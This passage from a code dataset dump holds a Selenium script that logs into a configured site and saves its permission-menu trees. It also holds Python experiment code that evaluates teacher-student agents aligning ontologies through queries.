"line_number": 96, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 99, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 99, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 99, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 100, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 100, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 100, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 111, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_404_NOT_FOUND", "line_number": 111, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 111, "usage_type": "name"}, {"api_name": "posts.models.Post.objects.filter", "line_number": 118, "usage_type": "call"}, {"api_name": "posts.models.Post.objects", "line_number": 118, "usage_type": "attribute"}, {"api_name": "posts.models.Post", "line_number": 118, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 118, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 121, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 121, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 121, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 124, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 124, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 124, "usage_type": "name"}, {"api_name": "posts.models.Post.objects.get", "line_number": 135, "usage_type": "call"}, {"api_name": "posts.models.Post.objects", "line_number": 135, "usage_type": "attribute"}, {"api_name": "posts.models.Post", "line_number": 135, "usage_type": "name"}, {"api_name": "posts.models.Post.DoesNotExist", "line_number": 136, "usage_type": "attribute"}, {"api_name": "posts.models.Post", "line_number": 136, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 155, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 167, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 167, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 167, "usage_type": "name"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 103, "usage_type": "call"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 104, "usage_type": "call"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 104, "usage_type": "name"}, {"api_name": "myblog.permissions.IsStaffOrIsSuperUser", "line_number": 104, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 170, "usage_type": "name"}, {"api_name": "comments.api.serializers.DetailCommentSerializer", "line_number": 171, "usage_type": "name"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 172, "usage_type": "name"}, {"api_name": "rest_framework.permissions.AllowAny", "line_number": 172, "usage_type": "name"}, {"api_name": "rest_framework.pagination.PageNumberPagination", "line_number": 173, "usage_type": "name"}, {"api_name": "rest_framework.filters.SearchFilter", "line_number": 174, "usage_type": "name"}, {"api_name": "rest_framework.filters.OrderingFilter", "line_number": 174, "usage_type": "name"}, {"api_name": "posts.models.Post.objects.get", "line_number": 180, "usage_type": "call"}, {"api_name": "posts.models.Post.objects", "line_number": 180, "usage_type": "attribute"}, {"api_name": "posts.models.Post", "line_number": 180, "usage_type": "name"}, {"api_name": "comments.models.Comment.objects.filter", "line_number": 183, "usage_type": "call"}, {"api_name": "comments.models.Comment.objects", "line_number": 183, "usage_type": "attribute"}, {"api_name": "comments.models.Comment", "line_number": 183, "usage_type": "name"}]} +{"seq_id": "27715604146", "text": "# 一键生成菜单功能按钮\nimport datetime,json,re,time,requests,os\nfrom json import JSONDecodeError\nfrom selenium import webdriver\nfrom urllib.parse import urlencode\nfrom config import hayden_conf\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.wait import WebDriverWait\n\ndef get_html_source(url,session):\n if isinstance(session,requests.sessions.Session):\n req=session.get(url)\n if req.status_code==200:\n return req.text\n else:\n raise Exception(\"请求失败{}\".format(req.status_code))\ndef parse_html(data):\n data_change=None\n try:\n data_change=json.loads(data)\n except JSONDecodeError:\n print(\"数据不是json\",data)\n if data_change and \"data\" in data_change.keys():\n items=data_change.get(\"data\")\n merge={}\n for item in items:\n merge[item[\"codepath\"]] = [item[\"name\"]]\n else:\n raise Exception(\"解析data数据失败\")\n order_dic = sorted(merge.items(), key=lambda x: x[0])\n return order_dic\ndef generate_session(url,name,password,module=\"sy\"):\n option=Options()\n option.add_argument(\"--headless\")\n option.add_argument(\"--disable-gpu\")\n driver=webdriver.Chrome(chrome_options=option)\n driver.get(url)\n if int(hayden_conf.LOGIN_TYPE)==1:\n driver.find_element_by_id(\"name\").send_keys(name)\n driver.find_element_by_id(\"pwd1\").send_keys(password)\n driver.find_element_by_xpath(r'//a[@onclick=\"login()\"]').click()\n elif int(hayden_conf.LOGIN_TYPE)==2:\n driver.find_element_by_id(\"username\").send_keys(name)\n driver.find_element_by_id(\"pwd1\").send_keys(password)\n driver.find_element_by_css_selector(r'input[value=\"立即登录\"]').click()\n time.sleep(1)\n wait=WebDriverWait(driver,10)\n wait.until(EC.presence_of_element_located((By.XPATH,\"/html/body/script\")))\n\n if module==\"sy\":\n driver.get(url+\"#eyJtYyI6InN5IiwiZmMiOiJTWV9QRVJNSVNTT05fUEMiLCJ1YyI6IjAxNzAwMDQ1MDAxMCJ9\")\n time.sleep(1)\n html_source=driver.page_source\n csrf=re.search(\"window.csrf = '(.*?)'\",html_source).group(1)\n cookies=driver.get_cookies()\n driver.close()\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Connection': 'keep-alive',\n 'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3'\n }\n sess=requests.session()\n sess.headers.update(headers)\n for cookie in cookies:\n sess.cookies.set(cookie[\"name\"],cookie[\"value\"])\n sess.headers.update({\"csrf\":csrf})\n return sess\ndef save_to_file(parse_data_dic,menu=\"pc\"):\n if not os.path.exists(\"./file\"):\n os.mkdir(\"./file\")\n with open(\"file/{0}_{1}_{2}_{3}.txt\".format(menu,hayden_conf.DOMAIN[7:].split(\"/\")[0].split(\":\")[0],hayden_conf.USERNAME,datetime.date.today()),\"w\",encoding=\"utf-8\") as f:\n for d in parse_data_dic:\n k,v=d\n k1=str(k).split(\"#\",1)[-1]\n if len(str(k).split(\"#\",1))==1:\n f.write(\"\\n\")\n f.write(k1 + \":\" + str(v) + \"\\n\")\ndef main():\n params={\n \"clientType\": 0,\n \"contentType\": \"json\",\n \"ajax\": \"true\",\n }\n url=hayden_conf.DOMAIN+\"/sy/SY_PERMISSON_PC/getPermissionTree?\"+urlencode(params)\n user=hayden_conf.USERNAME\n pwd=hayden_conf.PASSWORD\n req_session=generate_session(hayden_conf.DOMAIN,user,pwd)\n # PC端\n source=get_html_source(url,req_session)\n save_to_file(parse_html(source),menu=\"pc\")\n # 移动端\n url_mobile = hayden_conf.DOMAIN + \"/sy/SY_PERMISSION_M/getPermissionTree?\"+ urlencode(params)\n source_mobile = get_html_source(url_mobile, req_session)\n save_to_file(parse_html(source_mobile),menu=\"m\")\nif __name__ == '__main__':\n main()", "repo_name": "weiyyed/internetWorm", "sub_path": "hayden_permission_demo.py", "file_name": "hayden_permission_demo.py", "file_ext": "py", "file_size_in_byte": 4015, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.sessions", "line_number": 13, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 22, "usage_type": "call"}, {"api_name": "json.JSONDecodeError", "line_number": 23, "usage_type": "name"}, {"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 35, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 38, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 38, "usage_type": "name"}, {"api_name": "config.hayden_conf.LOGIN_TYPE", "line_number": 40, "usage_type": "attribute"}, {"api_name": "config.hayden_conf", "line_number": 40, "usage_type": "name"}, {"api_name": "config.hayden_conf.LOGIN_TYPE", "line_number": 44, "usage_type": "attribute"}, {"api_name": "config.hayden_conf", "line_number": 44, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 48, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.wait.WebDriverWait", "line_number": 49, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 50, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 50, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 50, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 50, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 54, "usage_type": "call"}, {"api_name": "re.search", "line_number": 56, "usage_type": "call"}, {"api_name": "requests.session", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 73, "usage_type": "call"}, {"api_name": "config.hayden_conf.DOMAIN", "line_number": 74, "usage_type": "attribute"}, {"api_name": "config.hayden_conf", "line_number": 74, "usage_type": "name"}, {"api_name": "config.hayden_conf.USERNAME", "line_number": 74, "usage_type": "attribute"}, {"api_name": "datetime.date.today", "line_number": 74, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 74, "usage_type": "attribute"}, {"api_name": "config.hayden_conf.DOMAIN", "line_number": 87, "usage_type": "attribute"}, {"api_name": "config.hayden_conf", "line_number": 87, "usage_type": "name"}, {"api_name": "urllib.parse.urlencode", "line_number": 87, "usage_type": "call"}, {"api_name": "config.hayden_conf.USERNAME", "line_number": 88, "usage_type": "attribute"}, {"api_name": "config.hayden_conf", "line_number": 88, "usage_type": "name"}, {"api_name": "config.hayden_conf.PASSWORD", "line_number": 89, "usage_type": "attribute"}, {"api_name": "config.hayden_conf", "line_number": 89, "usage_type": "name"}, {"api_name": "config.hayden_conf.DOMAIN", "line_number": 90, "usage_type": "attribute"}, {"api_name": "config.hayden_conf", "line_number": 90, "usage_type": "name"}, {"api_name": "config.hayden_conf.DOMAIN", "line_number": 95, "usage_type": "attribute"}, {"api_name": "config.hayden_conf", "line_number": 95, "usage_type": "name"}, {"api_name": "urllib.parse.urlencode", "line_number": 95, "usage_type": "call"}]} +{"seq_id": "25663882033", "text": "from experiment_utils import *\nimport datetime\nfrom tensorboardX import SummaryWriter\nimport pickle\nimport os\n# from agents import Agent\nimport shutil\n\ndef evaluate_students_understanding(student_agent, gt_results):\n\tquery_results = student_agent.get_student_query_results()\n\n\tquery_results_set = set(query_results)\n\t# evaluate results with GT results\n\tif len(query_results_set) != 0:\n\t\tprecision = len(gt_results.intersection(query_results_set)) / len(query_results_set)\n\telse:\n\t\tprecision = 0\n\trecall = len(gt_results.intersection(query_results_set)) / len(gt_results)\n\treturn precision, recall, len(query_results_set)\n\ndef teacher_student_one_query_one_interaction_cycle(teacher_agent, student_agent, gt_results_set, steps):\n\tepisode_generation_deadend = False\n\tfor step in range(steps):\n\t\tteachers_output = teacher_agent.select_next_teaching_example()\n\t\tif teachers_output is None:\n\t\t\tepisode_generation_deadend = True\n\t\t\tbreak\n\t\texample = teachers_output\n\t\texample_was_clear = student_agent.learn_from_example(example)\n\t\tteacher_agent.comprehend_students_response_on_example(example_was_clear)\n\n\tprecision, recall, query_result_size = evaluate_students_understanding(student_agent, gt_results_set)\n\n\treturn step+1, precision, recall, query_result_size, episode_generation_deadend\n\n\ndef teacher_student_one_query_experiment(teacher_agent, student_agent, teacher_policy, student_policy,\n\t\t\t\t\t\t\t\t\t\t teacher_property, student_property, max_steps, eval_every, output_dict_step_wise):\n\t'''\n\tHere, one selected agent is trying to query something specific (one query) from another agent.\n\tThe evaluation should take place on the query results in traditional IR terms.\n\t'''\n\n\t# get Ground Truth results, by querying the student with the correct translation\n\tgt_student_query_results = set()\n\tfor correct_result in student_agent.graph.subjects(RDF.type, URIRef(student_property)):\n\t\tgt_student_query_results.add(correct_result)\n\tnum_gt_results = len(gt_student_query_results)\n\n\tteacher_query_results = set()\n\tfor correct_result in teacher_agent.graph.subjects(RDF.type, URIRef(teacher_property)):\n\t\tteacher_query_results.add(correct_result)\n\tnum_teacher_results = len(teacher_query_results)\n\n\tteacher_translated_answer_URIs = teacher_agent.translate_URIs_for_other_agent(teacher_query_results)\n\n\tcommon_results = teacher_translated_answer_URIs.intersection(gt_student_query_results)\n\tnum_joint_results = len(common_results)\n\n\t# init teacher and student\n\tsuccessful_setup = teacher_agent.reset_as_teacher(query_property=teacher_property,\n\t\t\t\t\t\t\t\t\t\t\t\t\t teacher_policy=teacher_policy)\n\n\tif successful_setup and num_gt_results == 0:\n\t\t# print(\"Query:\", teacher_property, \"was captured by teacher's concepts, but student has not results!\", student_property)\n\t\toutcome_dict = {\"completed\": False, \"fail_reason\": \"Student has no GT query results.\"}\n\t\toutcome_dict[\"num_gt_results\"] = num_gt_results\n\t\toutcome_dict[\"num_teacher_results\"] = num_teacher_results\n\t\toutcome_dict[\"num_joint_results\"] = num_joint_results\n\t\treturn outcome_dict, output_dict_step_wise\n\telif not successful_setup:\n\t\toutcome_dict = {\"completed\": False, \"fail_reason\": \"Teacher failed to find relevant examples.\"}\n\t\toutcome_dict[\"num_gt_results\"] = num_gt_results\n\t\toutcome_dict[\"num_teacher_results\"] = num_teacher_results\n\t\toutcome_dict[\"num_joint_results\"] = num_joint_results\n\t\treturn outcome_dict, output_dict_step_wise\n\n\tstudent_agent.reset_as_student(student_policy=student_policy)\n\n\t# query_symbol = teacher_agent.characteristic_to_symbol[teacher_property]\n\n\ttotal_steps = 0\n\tprecision = 0\n\trecall = 0\n\ttensorboard_recording_step = 0\n\tepisode_generation_deadend = False\n\n\tquery_result_size = 0\n\tteachers_ep_mem_size = 0\n\tstudents_ep_mem_size = 0\n\tteachers_sem_mem_size = 0\n\tstudents_sem_mem_size = 0\n\n\twhile(tensorboard_recording_step < max_steps):\n\t\ttensorboard_recording_step += eval_every\n\n\t\t# if the experiment still goes on, we continue to execute it normally\n\t\tif not((precision == 1 and recall == 1) or episode_generation_deadend):\n\t\t\tstep, precision, recall, query_result_size, episode_generation_deadend = \\\n\t\t\t\tteacher_student_one_query_one_interaction_cycle(teacher_agent, student_agent,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tgt_student_query_results, steps=eval_every)\n\t\t\tteachers_ep_mem_size = teacher_agent.get_episodic_memory_size()\n\t\t\tstudents_ep_mem_size = student_agent.get_episodic_memory_size()\n\t\t\tteachers_sem_mem_size = teacher_agent.get_semantic_memory_size()\n\t\t\tstudents_sem_mem_size = student_agent.get_semantic_memory_size()\n\t\t\toutput_dict_step_wise[\"0.running\"][tensorboard_recording_step].append(True)\n\t\t\ttotal_steps += step\n\t\telse:\n\t\t\toutput_dict_step_wise[\"0.running\"][tensorboard_recording_step].append(False)\n\n\n\t\t# either if the experiment still goes on, or simply if we have the last recorded values, we still record them for tensorboard.\n\t\toutput_dict_step_wise[\"1.precision\"][tensorboard_recording_step].append(precision)\n\t\toutput_dict_step_wise[\"2.recall\"][tensorboard_recording_step].append(recall)\n\t\toutput_dict_step_wise[\"3.query_result_size\"][tensorboard_recording_step].append(query_result_size)\n\t\toutput_dict_step_wise[\"4.teachers_ep_mem_size\"][tensorboard_recording_step].append(teachers_ep_mem_size)\n\t\toutput_dict_step_wise[\"5.students_ep_mem_size\"][tensorboard_recording_step].append(students_ep_mem_size)\n\t\toutput_dict_step_wise[\"6.teachers_sem_mem_size\"][tensorboard_recording_step].append(teachers_sem_mem_size)\n\t\toutput_dict_step_wise[\"7.students_sem_mem_size\"][tensorboard_recording_step].append(students_sem_mem_size)\n\n\n\toutcome_dict={}\n\toutcome_dict[\"completed\"] = True\n\toutcome_dict[\"precision\"] = precision\n\toutcome_dict[\"recall\"] = recall\n\toutcome_dict[\"total_steps\"] = total_steps\n\toutcome_dict[\"episode_generation_deadend\"] = int(episode_generation_deadend)\n\toutcome_dict[\"query_result_size\"] = query_result_size\n\toutcome_dict[\"num_gt_results\"] = num_gt_results\n\toutcome_dict[\"num_teacher_results\"] = num_teacher_results\n\toutcome_dict[\"num_joint_results\"] = num_joint_results\n\toutcome_dict[\"teachers_ep_mem_size\"] = teacher_agent.get_episodic_memory_size()\n\toutcome_dict[\"students_ep_mem_size\"] = student_agent.get_episodic_memory_size()\n\toutcome_dict[\"teachers_sem_mem_size\"] = teacher_agent.get_semantic_memory_size()\n\toutcome_dict[\"students_sem_mem_size\"] = student_agent.get_semantic_memory_size()\n\n\treturn outcome_dict, output_dict_step_wise\n\n\n\n\ndef try_many_queries_separately_among_two_agents(args, ont_prefixes, query_mappings, teacher_policy, student_policy, exp_dir, complete_experiment_output_dict_step_wise):\n\tstatistics = defaultdict(dict)\n\tagent_1_prefix = ont_prefixes[0]\n\tagent_2_prefix = ont_prefixes[1]\n\tagent_1_teacher_key = \"teacher_\" + agent_1_prefix\n\tagent_2_teacher_key = \"teacher_\" + agent_2_prefix\n\n\tontology_pair_start_t = datetime.datetime.now()\n\n\t# preprocess and initialize agents\n\tagent_1 = Agent(agent_1_prefix, os.path.join(args.dataset_dir + \"/\" + args.data_directory, agent_1_prefix + \".owl\"))\n\tagent_2 = Agent(agent_2_prefix, os.path.join(args.dataset_dir + \"/\" + args.data_directory, agent_2_prefix + \".owl\"))\n\n\t# read common instance alignments\n\tif args.common_instances == \"simple\":\n\t\tcommon_URIs = get_common_objects([agent_1, agent_2])\n\t\tontology_1_to_ontology_2_instance_mapping_dict = {URI: URI for URI in common_URIs}\n\t\tontology_2_to_ontology_1_instance_mapping_dict = ontology_1_to_ontology_2_instance_mapping_dict\n\telif args.common_instances == \"extended\":\n\t\tontology_1_to_ontology_2_instance_mapping_dict = dict()\n\t\tontology_2_to_ontology_1_instance_mapping_dict = dict()\n\t\tfor line in open(args.dataset_dir + \"/\" + args.instance_alignments_dir + \"/\" + agent_1_prefix + \"-\" + agent_2_prefix + \".csv\", \"r\"):\n\t\t\tURI_1, URI_2 = line[:-1].split(\",\")\n\t\t\tURI_1, URI_2 = URIRef(URI_1), URIRef(URI_2)\n\t\t\tontology_1_to_ontology_2_instance_mapping_dict[URI_1] = URI_2\n\t\t\tontology_2_to_ontology_1_instance_mapping_dict[URI_2] = URI_1\n\telse:\n\t\traise ValueError(\"argument --common_instances, got wrong value:\" + args.common_instances)\n\n\t# save instance mapping dictionary, initialize groups and concept vocabulary\n\tagent_1.prepare_for_understanding_games(ontology_1_to_ontology_2_instance_mapping_dict)\n\tagent_2.prepare_for_understanding_games(ontology_2_to_ontology_1_instance_mapping_dict)\n\n\tontology_pair_output_dict_step_wise = defaultdict(lambda: defaultdict(list))\n\n\t# execute query experiments:\n\tfor q in range(len(query_mappings)):\n\t\tagents = [agent_1, agent_2]\n\t\tagent_teacher_keys = [agent_1_teacher_key, agent_2_teacher_key]\n\t\tquery_mapping = query_mappings[q]\n\n\t\tfor i in range(len(agents)):\n\t\t\tteacher_index = i\n\t\t\tstudent_index = (i + 1) % 2\n\t\t\tteacher_agent = agents[teacher_index]\n\t\t\tstudent_agent = agents[student_index]\n\t\t\tquery = query_mapping[teacher_index]\n\t\t\tquery_translation = query_mapping[student_index]\n\t\t\tquery_pair = (query,query_translation)\n\t\t\tagent_teacher_key = agent_teacher_keys[teacher_index]\n\n\t\t\tstatistics[agent_teacher_key][query_pair] = defaultdict(list)\n\n\t\t\tfor iteration in range(args.repetitions):\n\t\t\t\toutcome_dict, ontology_pair_output_dict_step_wise = teacher_student_one_query_experiment(teacher_agent, student_agent,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t teacher_policy, student_policy, URIRef(query),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t URIRef(query_translation), args.max_steps,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t args.eval_every, ontology_pair_output_dict_step_wise)\n\n\t\t\t\tstatistics[agent_teacher_key][query_pair][\"completed\"].append(outcome_dict[\"completed\"])\n\t\t\t\tstatistics[agent_teacher_key][query_pair][\"num_gt_results\"] = outcome_dict[\"num_gt_results\"]\n\t\t\t\tstatistics[agent_teacher_key][query_pair][\"num_teacher_results\"] = outcome_dict[\"num_teacher_results\"]\n\t\t\t\tstatistics[agent_teacher_key][query_pair][\"num_joint_results\"] = outcome_dict[\"num_joint_results\"]\n\n\t\t\t\tif outcome_dict[\"completed\"]:\n\t\t\t\t\tkeys_to_append_list = [\"precision\", \"recall\", \"total_steps\", \"episode_generation_deadend\", \"query_result_size\",\n\t\t\t\t\t\t\t\t\t\t \"teachers_ep_mem_size\", \"students_ep_mem_size\", \"teachers_sem_mem_size\", \"students_sem_mem_size\"]\n\t\t\t\t\tappend_to_list_from_one_dictionary_to_other(source_dict=outcome_dict, target_dict=statistics[agent_teacher_key][query_pair],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tkeys_to_append_list=keys_to_append_list)\n\t\t\t\t\tprefect_score = int((outcome_dict[\"precision\"] == 1) and (outcome_dict[\"recall\"] == 1))\n\t\t\t\t\tstatistics[agent_teacher_key][query_pair][\"perfect_score\"].append(prefect_score)\n\t\t\t\telse:\n\t\t\t\t\tstatistics[agent_teacher_key][query_pair][\"fail_reason\"].append(outcome_dict[\"fail_reason\"])\n\n\t# aggregate and structure query results\n\tont_pair_statistics = defaultdict(list)\n\tdetailed_statistics_str_descriptions = []\n\t# we save all unsuccessful queries (where the teacher couldn't come up with not even one example) in a list to print them all together at the end\n\tunsuccessful_queries = []\n\tfor (query_1, query_1_translation) in query_mappings:\n\t\tagent_teacher_keys = [agent_1_teacher_key, agent_2_teacher_key]\n\t\tqueries = [query_1, query_1_translation]\n\n\t\tfor i in range(len(agent_teacher_keys)):\n\t\t\tteacher_index = i\n\t\t\tstudent_index = (i + 1) % 2\n\t\t\tagent_teacher_key = agent_teacher_keys[teacher_index]\n\t\t\tquery = queries[teacher_index]\n\t\t\tquery_translation = queries[student_index]\n\t\t\tquery_pair = (query, query_translation)\n\n\t\t\tav_stats_dict, std_stats_dict = aggregate_statistics_of_dictionary_of_list_of_values(statistics[agent_teacher_key][query_pair])\n\n\t\t\tquery_description_str = \"Query: \" + query + \" (\" + str(av_stats_dict[\"num_teacher_results\"])\\\n\t\t\t\t\t\t\t\t\t+ \"), -> \" + query_translation +\"(\" + str(av_stats_dict[\"num_gt_results\"]) \\\n\t\t\t\t\t\t\t\t\t+ \"), Common Results: \" + str(av_stats_dict[\"num_joint_results\"])\n\n\t\t\t# in case for some reason, the game was not successfully initiated for any of the iterations:\n\t\t\t# (if no experiment was executed successfully, then no statistics were appended for this teacher-query combination)\n\t\t\tif sum(statistics[agent_teacher_key][query_pair][\"completed\"]) == 0:\n\t\t\t\tunsuccessful_queries.append((query_description_str, av_stats_dict[\"fail_reason\"][0]))\n\t\t\t\tont_pair_statistics[\"completed\"] += statistics[agent_teacher_key][query_pair][\"completed\"]\n\t\t\telse:\n\t\t\t\tkeys_to_append_list = [\"completed\", \"precision\", \"recall\", \"total_steps\", \"query_result_size\", \"episode_generation_deadend\",\n\t\t\t\t\t\t\t\t\t \"perfect_score\", \"teachers_ep_mem_size\", \"students_ep_mem_size\", \"teachers_sem_mem_size\", \"students_sem_mem_size\"]\n\t\t\t\tappend_to_list_from_one_dictionary_to_other(source_dict=statistics[agent_teacher_key][query_pair], target_dict=ont_pair_statistics,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tkeys_to_append_list=keys_to_append_list)\n\t\t\t\tdetailed_statistics_str_descriptions.append(query_description_str)\n\t\t\t\tdetailed_statistics_str_descriptions.append(format_average_query_performance_in_str(av_stats_dict, std_stats_dict, is_single_query=True))\n\n\ttensorboard_writer_ontology_pair_experiment_dir = os.path.join(exp_dir, \"-\".join(ont_prefixes))\n\tos.mkdir(tensorboard_writer_ontology_pair_experiment_dir)\n\tontology_pair_tensorboard_writer = SummaryWriter(log_dir=tensorboard_writer_ontology_pair_experiment_dir)\n\n\t# write to tensorboard while also update complete_experiment_output_dict_step_wise according to ontology_pair_output_dict_step_wise 9append values per key and per step.\n\t_, complete_experiment_output_dict_step_wise = write_average_query_performance_to_tensorboard(\n\t\tontology_pair_tensorboard_writer, ontology_pair_output_dict_step_wise, args.max_steps, args.eval_every,\n\tother_dictionary_to_append=complete_experiment_output_dict_step_wise)\n\n\t# write results to file\n\t# aggregate and report results per agent-teacher_role and per query\n\twith open(os.path.join(exp_dir, \"-\".join(ont_prefixes) + \".txt\"), \"w\") as ontology_pair_file:\n\n\t\tnum_completed_query_experiments = int(len(detailed_statistics_str_descriptions)/2)\n\n\t\ttext_for_ontology_pair_file = \"Agent: \" + agent_1_prefix +\" (\" + str(len(agent_1.get_all_named_individuals()))\n\t\ttext_for_ontology_pair_file += \"), Agent: \" + agent_2_prefix +\" (\" + str(len(agent_2.get_all_named_individuals()))\n\t\ttext_for_ontology_pair_file += \"), Common: \" + str(len(ontology_1_to_ontology_2_instance_mapping_dict)) + \", Query Pairs: \" + str(len(query_mappings))\n\t\ttext_for_ontology_pair_file += f\" Completed Queries: {num_completed_query_experiments}, Unsuccessful Queries: {len(unsuccessful_queries)}\"\n\n\t\tontology_pair_file.write(text_for_ontology_pair_file + \"\\n\")\n\n\t\tav_ont_pair_stats_dict, std_ont_pair_stats_dict = aggregate_statistics_of_dictionary_of_list_of_values(ont_pair_statistics)\n\n\t\tontology_pair_file.write(\"Overall ontology pair performance over the completed query experiments:\\n\")\n\t\tontology_pair_overall_performance_str = format_average_query_performance_in_str(av_ont_pair_stats_dict, std_ont_pair_stats_dict, is_single_query=False)\n\t\tontology_pair_file.write(ontology_pair_overall_performance_str + \"\\n\")\n\n\t\twith open(os.path.join(exp_dir, \"0_Comparisons_Summary.txt\"), \"a\") as complete_experiments_comparisons_file:\n\t\t\tcomplete_experiments_comparisons_file.write(text_for_ontology_pair_file + \"\\n\" + ontology_pair_overall_performance_str + \"\\n\\n\")\n\n\t\tontology_pair_end_t = datetime.datetime.now()\n\t\tontology_pair_time_delta = ontology_pair_end_t - ontology_pair_start_t\n\t\tontology_pair_minutes = ontology_pair_time_delta.total_seconds() / 60\n\t\tontology_pair_file.write(f\"Experiment duration: {ontology_pair_minutes:05.2} minutes.\\n\\n\\n\")\n\n\t\t# then report for each completed query experiment\n\t\tfor i in range(num_completed_query_experiments):\n\t\t\tquery_description_str = detailed_statistics_str_descriptions[i*2]\n\t\t\tquery_results_str = detailed_statistics_str_descriptions[i*2 + 1]\n\t\t\tontology_pair_file.write(query_description_str + \"\\n\" + query_results_str + \"\\n\\n\")\n\t\t\t# print(query_description_str + \"\\n\" + query_results_str + \"\\n\")\n\n\t\t# finally, report for each unsuccessful experiment\n\t\tontology_pair_file.write(\"\\nUnsuccessful Queries:\\n\")\n\t\tfor (query_description_str, fail_reason) in unsuccessful_queries:\n\t\t\tontology_pair_file.write(query_description_str + \"| Reason:\" + fail_reason + \"\\n\\n\")\n\t\t\t# print(query_description_str + \"| Reason:\" + fail_reason + \"\\n\")\n\n\treturn ont_pair_statistics, complete_experiment_output_dict_step_wise\n\ndef run_all_teacher_student_combinations_using_gold_alignments(args):\n\tall_prefix_pairs = get_all_prefix_pairs()\n\n\t# prepare experiment directories and filenames\n\tif not os.path.isdir(args.exp_dir):\n\t\tos.mkdir(args.exp_dir)\n\tif len(all_prefix_pairs) == 21:\n\t\texperiment_name = \"all_ontology_pairs__\"\n\telse:\n\t\texperiment_name = \"_\".join(all_prefix_pairs) + \"__\"\n\n\tteacher_policy = args.teacher_policy\n\tstudent_policy = args.student_policy\n\n\texperiment_name += \"TP=\" + teacher_policy + \"__SP=\" + student_policy + \"__\"\n\texperiment_name += \"reps=\" + str(args.repetitions) + \"__\"\n\texperiment_name += \"instances=\" + args.common_instances + \"__\"\n\texperiment_name += \"max_steps=\" + str(args.max_steps)\n\n\texp_dir = os.path.join(args.exp_dir, experiment_name)\n\t# \tif the directory exists already then we empty it\n\tif os.path.isdir(exp_dir):\n\t\tfor file in os.listdir(exp_dir):\n\t\t\tpath = os.path.join(exp_dir, file)\n\t\t\tif os.path.isfile(path):\n\t\t\t\tos.remove(path)\n\t\t\telse:\n\t\t\t\tshutil.rmtree(path)\n\t# otherwise, we just create it\n\telse:\n\t\tos.mkdir(exp_dir)\n\n\n\tprint(\"Running experiment. Output will be saved in directory:\", exp_dir)\n\n\ttensorboard_writer_average_experiment_dir = os.path.join(exp_dir, \"average\")\n\tos.mkdir(tensorboard_writer_average_experiment_dir)\n\texperiment_average_tensorboard_writer = SummaryWriter(log_dir=tensorboard_writer_average_experiment_dir)\n\n\tontology_pair_performances_dict = defaultdict(list)\n\t# monitor experiment execution time per ontology pair.\n\tstart_t = datetime.datetime.now()\n\n\tcomplete_experiment_output_dict_step_wise = defaultdict(lambda: defaultdict(list))\n\n\tfor prefix_pair in all_prefix_pairs:\n\t\tprefix_pair_tuple = prefix_pair.split(\"-\")\n\t\tequivalent_classes, equivalent_properties = load_ontology_alignments(ont_1_prefix=prefix_pair_tuple[0],\n\t\t\t\t\t\t ont_2_prefix=prefix_pair_tuple[1], 